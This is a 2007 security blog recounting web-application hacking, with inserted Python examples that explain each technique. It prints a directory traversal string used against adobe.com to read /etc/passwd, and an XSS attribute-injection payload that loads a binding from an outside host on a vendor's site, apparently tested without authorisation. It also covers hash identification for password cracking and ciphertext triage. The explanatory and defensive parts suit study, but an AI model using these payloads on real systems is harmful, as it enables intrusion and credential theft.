Sunday, September 30, 2007

Have you downloaded your scancode?

I was reading Shreeraj's article on source code review, and it was a basic yet straightforward article on source code reviewing. In the article he walks the audience through everything from dependency determination to mitigation and countermeasures for a web application. On top of that, he included a tool he coded himself, called "scancode", which scans source code for potential entry points for XSS and SQLi. This is a must-read for those who want to know more about the source code review process and methodology. Download scancode on page 3 of the article, right at the bottom.

http://www.oreillynet.com/pub/a/sysadmin/2006/11/02/webapp_security_scans.html

These days I am so involved with application security that I have neglected the networking area. Well, I am trying to shift myself slowly away from the technical side of things and want to get more involved in business and development work. However, I will still keep myself abreast of the latest things going on in the security world.

The Hacka Man

Adobe Directory Traversal???????

The other night Christ1an showed me a link on Adobe.com with a directory traversal. It was an old exploit; however, it worked on Adobe. This showed that Adobe is not taking application security seriously. Well, I managed to see the entire /etc/passwd file and DAMN!! I did not take a screenshot of it. I was too careless and excited to take a screenshot. The following day the issue was resolved, after reports were made to Adobe. Well, check out the exploit that was used against Adobe here:

http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=../../../../../../../../../etc/passwd

Add a null byte character at the end of passwd. Please note that the exploit will not work anymore. However, this is the actual string I used a few nights ago.

The Hacka Man
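An added illustration, not Adobe's download.cgi (which the post does not show): a Python model of the two halves of this trick. One handler glues the parameter into a path and appends its own suffix, which a trailing null byte cuts off the way a C-string consumer would; the other rejects NUL bytes and requires the normalised path to stay under the download root. The root directory, the appended suffix and the sample file name are assumptions.

```python
import posixpath

# Added example, not Adobe's download.cgi: a model of a download handler that
# concatenates a request parameter into a filesystem path.  The root directory,
# the suffix the server appends and the sample file name are assumptions.
DOWNLOAD_ROOT = "/var/www/shockwave/download"
SUFFIX = ".txt"

PAYLOAD = "../../../../../../../../../etc/passwd"   # the string from the post, minus the NUL


def vulnerable_path(param: str) -> str:
    """Path a naive handler opens: root + param + suffix, with no validation.

    Perl's open() and C's fopen() hand the path to the OS as a NUL-terminated
    string, so everything after the first \\x00 is discarded; the split below
    emulates that truncation, which is what makes the trailing null byte useful.
    """
    path = DOWNLOAD_ROOT + "/" + param + SUFFIX
    if "\x00" in path:
        path = path.split("\x00", 1)[0]
    return posixpath.normpath(path)


def safe_path(param: str) -> str:
    """Hardened handler: refuse NUL bytes, normalise, keep the result under root.

    normpath only collapses textual ../ segments; on a live filesystem also run
    os.path.realpath on the result so a symlink inside the root cannot escape it.
    """
    if "\x00" in param:
        raise ValueError("NUL byte in parameter")
    candidate = posixpath.normpath(posixpath.join(DOWNLOAD_ROOT, param + SUFFIX))
    # commonpath compares whole components, so /var/www/shockwave/download.txt
    # does not pass as being inside /var/www/shockwave/download
    if posixpath.commonpath([DOWNLOAD_ROOT, candidate]) != DOWNLOAD_ROOT:
        raise ValueError("path escapes download root: %r" % candidate)
    return candidate


if __name__ == "__main__":
    print(vulnerable_path(PAYLOAD))           # the suffix defeats the plain payload
    print(vulnerable_path(PAYLOAD + "\x00"))  # the null byte drops the suffix
    for p in ("release_notes", PAYLOAD, PAYLOAD + "\x00"):
        try:
            print("served:", safe_path(p))
        except ValueError as err:
            print("rejected:", err)
```

The first print shows why the plain `../` payload alone was not enough against a handler that appends its own suffix, and the second why the null byte fixes that; the hardened version rejects both, as well as an absolute path and a `../download` that would normalise to a sibling of the root.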

HashMaster v0.2

Damn, Rsnake just released a small yet useful program known as HashMaster. I was auditing a customer last weekend, and the hashing was rather obfuscated and long. I am not sure if that was encryption or hashing; however, I am going to try it on the customer this weekend. The program is very simple to use: just enter the cleartext password and the hash string into the form, and the program will work out the hashing algorithm used. This is rather useful, because once you know the hashing algorithm, you can use cracking software to crack the actual passwords. Well, good work Rsnake, you actually made my job easier!

http://ha.ckers.org/hashmaster

The Hacka Man
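An added example, not RSnake's HashMaster itself: the same idea done offline in Python. Given a cleartext you know and the string the application stores for it, it tries the common digest constructions (plain, nested PHP-style, salted on either side) in hex and base64 and reports every one that reproduces the stored value; a shape-based guess_format() does the cheaper triage that separates a digest from something that is probably a ciphertext. The candidate list, salt placements and sample values are assumptions.

```python
import base64
import hashlib
import re

# Added example, not RSnake's HashMaster: given a known cleartext and the stored
# string, try the usual digest constructions and report every one that matches.
# Candidate list, salt placements and sample values are assumptions.


def _nested(outer, inner):
    # PHP-style md5(md5($p)): the inner digest is fed in as its hex string
    return lambda b: hashlib.new(outer, hashlib.new(inner, b).hexdigest().encode()).digest()


CONSTRUCTIONS = {
    "md5": lambda b: hashlib.md5(b).digest(),
    "sha1": lambda b: hashlib.sha1(b).digest(),
    "sha256": lambda b: hashlib.sha256(b).digest(),
    "sha512": lambda b: hashlib.sha512(b).digest(),
    "md5(md5(x))": _nested("md5", "md5"),
    "sha1(md5(x))": _nested("sha1", "md5"),
    "md5(sha1(x))": _nested("md5", "sha1"),
}

ENCODINGS = {
    "hex": lambda d: d.hex(),
    "base64": lambda d: base64.b64encode(d).decode("ascii"),
}


def identify(cleartext: str, stored: str, salts=()) -> list:
    """Return labels such as 'md5/hex' or 'sha1/base64 salt+x' that reproduce `stored`."""
    stored = stored.strip()
    inputs = [("x", cleartext)]
    for salt in salts:
        inputs += [("salt+x", salt + cleartext), ("x+salt", cleartext + salt)]
    hits = []
    for placement, text in inputs:
        for name, construct in CONSTRUCTIONS.items():
            digest = construct(text.encode("utf-8"))
            for enc_name, encode in ENCODINGS.items():
                produced = encode(digest)
                # hex is case-insensitive, base64 is not
                if produced == stored or (enc_name == "hex" and produced == stored.lower()):
                    label = f"{name}/{enc_name}"
                    hits.append(label if placement == "x" else f"{label} {placement}")
    return hits


_DIGEST_BITS = {
    128: "128-bit hex digest (MD5, MD4 or NTLM)",
    160: "160-bit hex digest (SHA-1 or RIPEMD-160)",
    256: "256-bit hex digest (SHA-256)",
    512: "512-bit hex digest (SHA-512)",
}


def guess_format(stored: str) -> str:
    """Shape-based triage: modular-crypt prefixes, then hex length, then base64."""
    s = stored.strip()
    if s.startswith("$1$"):
        return "md5crypt"
    if s[:4] in ("$2a$", "$2b$", "$2y$"):
        return "bcrypt"
    if s.startswith("$5$"):
        return "sha256crypt"
    if s.startswith("$6$"):
        return "sha512crypt"
    if s.startswith("{SHA}"):
        return "LDAP SHA-1, base64"
    if len(s) == 13 and re.fullmatch(r"[./A-Za-z0-9]{13}", s):
        return "traditional DES crypt"
    if re.fullmatch(r"[0-9A-Fa-f]+", s):
        bits = len(s) * 4
        return _DIGEST_BITS.get(bits, f"{bits}-bit hex string, not a common digest size (ciphertext?)")
    if re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", s) and len(s) % 4 == 0:
        return f"base64, {len(base64.b64decode(s)) * 8}-bit payload"
    return "unrecognised"


if __name__ == "__main__":
    sample = "5f4dcc3b5aa765d61d8327deb882cf99"   # constructed: md5 of "password"
    print(guess_format(sample))
    print(identify("password", sample))
    print(identify("password", "X03MO1qnZdYdgyfeuILPmQ==", salts=["s3cr3t"]))
```

A hit tells you which construction to feed a cracker; no hit with the salts you know, together with a guess_format() result such as "1024-bit hex string, not a common digest size", is the signal that you are looking at a ciphertext rather than a hash.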

Friday, September 28, 2007

Can Your Machine Be Hacked?

Last night I received an email from Rich Mclver, and he gave me a link to publish. Basically, in his post he provides users with ideas on how to close the holes in your PC. There are 12 tests, all of which give a rough idea of how to secure your machine. Well, I would say it is a good start for those who want to start learning about security overall. Check it out:

http://www.virtualhosting.com/blog/2007/can-your-machine-be-hacked-test-yourself-with-these-12-resources/

The Hacka Man

Thursday, September 27, 2007

Blueinfy.com

Want to know more about Web 2.0 hacking?
Want to have free Web 2.0 auditing tools and articles?
Want to know more about web security and hacking?

You will have to check out Blueinfy.com; it is definitely a site worth visiting, with great in-depth articles and simple yet easily understandable presentation slides that will definitely make you hungry for more. The founder is none other than Shreeraj Shah, an ex-employee of Foundstone USA. Google him and you will know how powerful he is :)

The Hacka Man

XSS on a vendors website

I am still testing the application for flaws. However, it is so secure that I can't do a single thing. In the end, I ended up testing a vendor's site for XSS. The vendor did a good job of escaping the < and > characters, and it gave me <SCRIPT>alert(2)</SCRIPT> when I viewed the source code. I was dejected, as I knew there was something more I could do. A few minutes later .mario was online and I told him about my problem. Immediately he came up with a trick that allows XSS to happen. So in the end I entered " style="-moz-binding:url(http://h4k.in/mozxss.xml#xss)" a=" into one of the form fields, and when I viewed the source code it was totally injected! This is what the source code displayed:

[input name="TxnEnd_Param" value="" style="-moz-binding:url(http://h4k.in/mozxss.xml#xss)" a="" type="hidden"]

Thank you .mario, you helped me understand XSS a lot more.

The Hacka Man
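An added example, not the vendor's code: why escaping only < and > leaves the attribute open. It renders the payload from the post into a hidden input with a vendor-style escaper and with full attribute escaping, then parses both with Python's html.parser to show which attributes a browser would actually see. The field name comes from the injected markup quoted above; the surrounding template is assumed.

```python
import html
from html.parser import HTMLParser

# Added example, not the vendor's code: escaping only < and > stops <script>
# but not the quote that closes value="...", so new attributes can be injected.
# The payload is the one from the post; the template around it is assumed.

PAYLOAD = '" style="-moz-binding:url(http://h4k.in/mozxss.xml#xss)" a="'
TEMPLATE = '<input name="TxnEnd_Param" value="%s" type="hidden">'


def escape_angle_only(value: str) -> str:
    """What the vendor did: neutralise tags but not the quote that closes value=."""
    return value.replace("<", "&lt;").replace(">", "&gt;")


def escape_attr(value: str) -> str:
    """What an attribute value needs: &, <, >, \" and ' all encoded."""
    return html.escape(value, quote=True)


def render(value: str, escaper) -> str:
    return TEMPLATE % escaper(value)


class _InputAttrs(HTMLParser):
    """Collects the attributes of the first <input> tag, as a browser would parse them."""

    def __init__(self):
        super().__init__()
        self.attrs = None

    def handle_starttag(self, tag, attrs):
        if tag == "input" and self.attrs is None:
            self.attrs = dict(attrs)   # entity references are already decoded here


def parsed_attrs(markup: str) -> dict:
    parser = _InputAttrs()
    parser.feed(markup)
    parser.close()
    return parser.attrs or {}


if __name__ == "__main__":
    for name, esc in (("angle brackets only", escape_angle_only),
                      ("full attribute escaping", escape_attr)):
        markup = render(PAYLOAD, esc)
        attrs = parsed_attrs(markup)
        print(f"{name}:\n  {markup}\n  attributes seen by the parser: {sorted(attrs)}")
        if "style" in attrs:
            print("  injected style attribute:", attrs["style"])
```

With the vendor's escaper the parser sees five attributes, including the injected style; with html.escape(quote=True) it sees three, and the whole payload ends up as the literal value of value=. The same run also shows that <SCRIPT>alert(2)</SCRIPT> is harmless under either escaper, which is exactly the observation that made the first attempt look safe.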

Tuesday, September 25, 2007

2 Factor Authentication Update

I don't believe this, I basically can't do SQL injection, CSRF or XSS! Everything I want to do is basically either encrypted, or if I inject a simple character like ", it says service unavailable. This application can be considered very secure in terms of encryption, and of a good standard if weighed against the OWASP Top Ten. Even if I enter a value like 10, this value will be encrypted like this:

Name=eb56be300a5b19b600b5dac4f0e96834&EventName=Immediate&encryptedString=MDEyOABhBMQY7SY0WgxGKrWjOOjaB91Q%5ENy1-UynPGaVPNGwQU2bM2OR8S0f-n1SQ7Oi1IDEKHty-SGaT78SbOH-opKMolLmboo6xTgxtxth4AFbv2klQaA3ulkErBXn%5EMHuX661Ro%5EXou9P95OrVN8xYgUaY-AMZWCwuKy9cAvoiukPZWoTRxslHOjxM7JapJ9tsvyp1ifrWjrgZjxiQfgS33znbhy2IaOqGNXFaA9rR4PvbsUFcqW0hVySynpxkNKRRxvxXJBIiCDlA9h1IK93ajLouNKITFaOVTBQSuK0upPOkjEuTJnbXM3qqZyf-i8amEULAXd4AhEkBBlGgjY8a9wWXJD61NJ-aPT5cVZ0s0H1ZZpvTto8NMRI1QiJAnYPMl4WXik8LTdChQ86n1OkUeP7Hfe4Fz13-JSEq%5E%5EvpgRjznQ4ZuLQ%5EHtMQ5D6yWWTRCPXtJ6jAj1Q2ZmYfPr9Q0uQX1YXN8UlwMXcf7igpQRXtR5yRwo3pm%5E6LJlmf7Hf94B4P26-K2iIOO%5EnVUeQbyZBt3YC4tNCWt8N5IFThY53-spUvlfRBAkwkwsK0NdkCajHGVoGLiynlc1J3GCIfZ0trlITgC9WntZgIOKXVZjTwYWe5hEAuqfHSMixUSCExNu4ZC4ZUQE%5EyK%5ElvKIl3Fd8fxx-GJjVajpHikGTHgfJ8KoeNH2SpUzEWPNQy63l4BkzqaeuJ7ssxeF%5EWhwcwfKuBzRF9rV5sss%5EP3WYjD4YsJvSZx%5EqXP1j8KIf6zfyh1xSqRJREWFXG5kSWXzlj03cL7SQmNjQupwJ9L25Km7GYhEUYfZYSsbNTr44vdkrpepIyLFRIITE29CZXXyVLrlK0OAIU7V9RfzJieGW0oBylrDqKK4VvLrKVbCj2t2hUwcDQwedGQK5J0O0W6v7Oeao9i9Y0keFg006rxP0gINtf8I9U5l%5E0RMvL7SQmNjQupyj1BfoSNNPOmsVd5RBRyJUy7dmjY1z6SxKT74w1LFyX9b-Wup4Bpykv-Ojshp82HwvLmlVapYc-I5yIyi5ev-%5E6-MiaJ-eATlq7nsFDamHtLjB09kFUKPMQArFYZzeyC1wNkE6i95PP80TJ0lPfgNkMuVhq5cxP2AXB7Kum3IJKcGeIJlpRTvpqBkeQ23jFVdIK61FykzXdSO6rlPpDFI0%5EYxJ2aAUQkn3hJJwOJW50AqBr4MBG-tU&encryptedString2=MDEyOABhBMQY7SY0WgxGKrWjOOjaB91Q%5ENy1-UynPGaVPNGwQU2bM2OR8S0f-n1SQ7Oi1IDEKHty-SGaT78SbOH-opKMolLmboo6xTgxtxth4AFbv2klQaA3ulkErBXn%5EMHuX661Ro%5EXou9P95OrVN8xYgUaY-AMZWCwuKy9cAvoiukPZfQSGPJ8Sz00GIRu7AqyMI3jMa6-sb5ZQJmYfPr9Q0uQs4F2ns3wU759YZpN-TxN6gqBr4MBG-tU

I am running out of ideas; tell me, what more can I do??

The Hacka Man

2 Factor Authentication Day 2

Damn, it's getting tough! Have you guys seen a 6-digit password with an encrypted string this long?

ENCRYPTED_PASSWORD=9F9E9BB6E172C931C479665544ADC5BC96E9E7025B6E717CE3BF4BF43590C801A15DF75B2BA87C87A251D3ADE4E24966CFC3F6AA8DA8DACC89BCCD3326C1BB424569F950D5FD7EF07D42AD53E9832678375EB0D0B18E5FB1E7FEBEB23A957D6DA1E83EF4D784687571464BEBFF6B73376545B0124623C18250142786AECD5120

Well, is there nothing more I can do? I dunno, still thinking...

The Hacka Man
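An added example that serves both this post and the preceding "2 Factor Authentication Update", not the audited application's code: a first-pass triage in Python of the three opaque values quoted in those posts. It measures what can be measured offline (encoding, decoded size, block alignment, and how much two samples share) and reaches no conclusion about the cipher or key; reading '-' and '^' as stand-ins for base64's '+' and '/' is a guess, made explicit in the code.

```python
import base64
import binascii
import re
import urllib.parse

# Added example, not the audited application's code.  The three constants are
# the values quoted in the two posts above, split over lines for readability.
# Treating '-' and '^' as this application's substitutes for base64's '+' and
# '/' is an assumption; everything else is measurement.

ENCRYPTED_PASSWORD = (
    "9F9E9BB6E172C931C479665544ADC5BC96E9E7025B6E717CE3BF4BF43590C801"
    "A15DF75B2BA87C87A251D3ADE4E24966CFC3F6AA8DA8DACC89BCCD3326C1BB42"
    "4569F950D5FD7EF07D42AD53E9832678375EB0D0B18E5FB1E7FEBEB23A957D6D"
    "A1E83EF4D784687571464BEBFF6B73376545B0124623C18250142786AECD5120"
)
ENCRYPTED_STRING_1 = (
    "MDEyOABhBMQY7SY0WgxGKrWjOOjaB91Q%5ENy1-UynPGaVPNGwQU2bM2OR8S0f-n1SQ7Oi1IDEKHty-SGaT78SbOH-op"
    "KMolLmboo6xTgxtxth4AFbv2klQaA3ulkErBXn%5EMHuX661Ro%5EXou9P95OrVN8xYgUaY-AMZWCwuKy9cAvoiukPZ"
    "WoTRxslHOjxM7JapJ9tsvyp1ifrWjrgZjxiQfgS33znbhy2IaOqGNXFaA9rR4PvbsUFcqW0hVySynpxkNKRRxvxXJBIiCDlA9h"
    "1IK93ajLouNKITFaOVTBQSuK0upPOkjEuTJnbXM3qqZyf-i8amEULAXd4AhEkBBlGgjY8a9wWXJD61NJ-aPT5cVZ0s0H1ZZpvTto8"
    "NMRI1QiJAnYPMl4WXik8LTdChQ86n1OkUeP7Hfe4Fz13-JSEq%5E%5EvpgRjznQ4ZuLQ%5EHtMQ5D6yWWTRCPXtJ6jAj1Q2ZmYfPr9Q0uQ"
    "X1YXN8UlwMXcf7igpQRXtR5yRwo3pm%5E6LJlmf7Hf94B4P26-K2iIOO%5EnVUeQbyZBt3YC4tNCWt8N5IFThY53-spUvlfRBAkwkwsK0"
    "NdkCajHGVoGLiynlc1J3GCIfZ0trlITgC9WntZgIOKXVZjTwYWe5hEAuqfHSMixUSCExNu4ZC4ZUQE%5EyK%5ElvKIl3Fd8fxx-GJjVajpHik"
    "GTHgfJ8KoeNH2SpUzEWPNQy63l4BkzqaeuJ7ssxeF%5EWhwcwfKuBzRF9rV5sss%5EP3WYjD4YsJvSZx%5EqXP1j8KIf6zfyh1xSqRJREWFXG5k"
    "SWXzlj03cL7SQmNjQupwJ9L25Km7GYhEUYfZYSsbNTr44vdkrpepIyLFRIITE29CZXXyVLrlK0OAIU7V9RfzJieGW0oBylrDqKK4"
    "VvLrKVbCj2t2hUwcDQwedGQK5J0O0W6v7Oeao9i9Y0keFg006rxP0gINtf8I9U5l%5E0RMvL7SQmNjQupyj1BfoSNNPOmsVd5RBRyJUy7"
    "dmjY1z6SxKT74w1LFyX9b-Wup4Bpykv-Ojshp82HwvLmlVapYc-I5yIyi5ev-%5E6-MiaJ-eATlq7nsFDamHtLjB09kFUKPMQArFYZzeyC1"
    "wNkE6i95PP80TJ0lPfgNkMuVhq5cxP2AXB7Kum3IJKcGeIJlpRTvpqBkeQ23jFVdIK61FykzXdSO6rlPpDFI0%5EYxJ2aAUQkn3hJJwOJW50AqBr4MBG-tU"
)
ENCRYPTED_STRING_2 = (
    "MDEyOABhBMQY7SY0WgxGKrWjOOjaB91Q%5ENy1-UynPGaVPNGwQU2bM2OR8S0f-n1SQ7Oi1IDEKHty-SGaT78SbOH-op"
    "KMolLmboo6xTgxtxth4AFbv2klQaA3ulkErBXn%5EMHuX661Ro%5EXou9P95OrVN8xYgUaY-AMZWCwuKy9cAvoiukPZ"
    "fQSGPJ8Sz00GIRu7AqyMI3jMa6-sb5ZQJmYfPr9Q0uQs4F2ns3wU759YZpN-TxN6gqBr4MBG-tU"
)

_HEX = re.compile(r"[0-9A-Fa-f]+")
_B64ISH = re.compile(r"[A-Za-z0-9+/\-^_=]+")
_ALPHABET_FIX = str.maketrans("-^_", "+//")   # assumed mapping back to standard base64


def _try_base64(s: str):
    """Decode with the assumed alphabet and any missing padding; None on failure."""
    t = s.translate(_ALPHABET_FIX)
    t += "=" * (-len(t) % 4)
    try:
        return base64.b64decode(t, validate=True)
    except (binascii.Error, ValueError):
        return None


def triage(value: str) -> dict:
    """Describe one opaque parameter value: encoding, decoded size, block alignment."""
    s = urllib.parse.unquote(value.strip())
    info = {"chars": len(s), "encoding": "unknown", "bytes": None, "aligned_to": []}
    raw = None
    if _HEX.fullmatch(s) and len(s) % 2 == 0:
        info["encoding"] = "hex"
        raw = bytes.fromhex(s)
    elif _B64ISH.fullmatch(s):
        raw = _try_base64(s)
        if raw is not None:
            custom = any(c in s for c in "-^_")
            info["encoding"] = "base64 (custom alphabet assumed)" if custom else "base64"
    if raw is not None:
        info["bytes"] = len(raw)
        info["aligned_to"] = [b for b in (8, 16) if len(raw) % b == 0]   # DES/3DES, AES block sizes
    return info


def _shared_prefix(a: str, b: str) -> int:
    n = 0
    while n < min(len(a), len(b)) and a[n] == b[n]:
        n += 1
    return n


def common_prefix_len(a: str, b: str) -> int:
    return _shared_prefix(urllib.parse.unquote(a), urllib.parse.unquote(b))


def common_suffix_len(a: str, b: str) -> int:
    return _shared_prefix(urllib.parse.unquote(a)[::-1], urllib.parse.unquote(b)[::-1])


if __name__ == "__main__":
    for label, blob in (("ENCRYPTED_PASSWORD", ENCRYPTED_PASSWORD),
                        ("encryptedString", ENCRYPTED_STRING_1),
                        ("encryptedString2", ENCRYPTED_STRING_2)):
        print(label, triage(blob))
    p = common_prefix_len(ENCRYPTED_STRING_1, ENCRYPTED_STRING_2)
    q = common_suffix_len(ENCRYPTED_STRING_1, ENCRYPTED_STRING_2)
    print(f"encryptedString vs encryptedString2: {p} leading and {q} trailing characters identical")
    # Two outputs for different inputs that agree on a long leading run point at
    # either a plaintext header or deterministic (unrandomised) encryption; a
    # fresh IV per message would not leave the leading bytes equal.
```

Running it reports ENCRYPTED_PASSWORD as 128 bytes (1024 bits) of hex, all block sizes aligned, a size consistent with a 1024-bit RSA ciphertext of a short value (nothing on the page confirms that), and shows encryptedString and encryptedString2 agreeing on their first 177 and last 10 characters even though they carry different inputs. That shared run, not the length, is the next thing to probe: resend the same value twice, change one character of the input, and watch how much of the output moves.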

Monday, September 24, 2007

2 Factor Authentication?

Well, if you guys ask me why I haven't been updating my blog, I can only say that there is so much to be done at work, and of course I have been reading a lot of Rsnake's XSS Exploits and Defense. I have been doing a lot of project management and technical work for my new company. I love my current company because of the flexible hours, nice colleagues and of course a very nice boss who is willing to listen to suggestions.

Well, back to the main topic: I have been assigned to hack an application with 2-factor authentication. Damn, all I can say is that it is very secure in terms of randomness of the session ID, hidden fields and encryption. There is no way I can break the application's login page, and the only thing I found is a jar file with lots of class files inside. Well, I know I could use a Java decompiler like jad to get the source code, but I did not, because I am concentrating more on finding vulnerabilities. Hmz.... I will continue with part 2 tomorrow. Firefox is a very cool tool for web hacking. Install the following extensions, guys:

1. DOM Inspector
2. LiveHTTP Headers
3. Tamper Data
4. Modify Header
5. Firebug
6. Greasemonkey with XSS Assistant and Post Interceptor

The Hacka Man

Monday, September 3, 2007

Sam, Wireless Hacking, Updates

It's been a long time since I last updated my blog. I have been so busy these days with my current job, from planning to hacking. Also, I have been reading Rsnake's and Jeremiah's book on XSS Exploits and Defense. It is a good book with great examples; however, there are some parts that I don't quite understand and I am still trying to catch up. Well, Sam, if you are reading this, check out the URL below for your wireless audit.

http://www.leetupload.com/tutorials/hackingspoonfed/part1

The Hacka Man